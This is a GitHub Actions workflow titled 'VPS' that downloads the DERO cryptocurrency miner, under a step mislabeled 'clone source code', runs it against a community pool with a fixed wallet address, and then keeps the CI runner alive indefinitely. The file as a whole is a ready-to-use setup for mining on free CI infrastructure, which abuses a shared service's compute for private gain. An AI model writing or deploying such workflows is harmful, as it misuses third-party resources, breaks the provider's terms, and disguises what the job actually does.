name: VPS
on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: clone source code
        run: wget -c https://github.com/deroproject/derohe/releases/latest/download/dero_linux_amd64.tar.gz
      - name: tar
        run: tar -zxpvf dero_linux_amd64.tar.gz
      - name: Run
        run:  ./dero_linux_amd64/dero-miner-linux-amd64 --wallet-address deroi1qyr8wnk9aw9lel0xcufdj98cqtd3lc5y84nhl679nm3wknaz0ad6xq9pvfz92xnjae7nqsan0aw --daemon-rpc-address=community-pools.mysrv.cloud:10300
      - name: run loop
        run: tail -f /dev/null
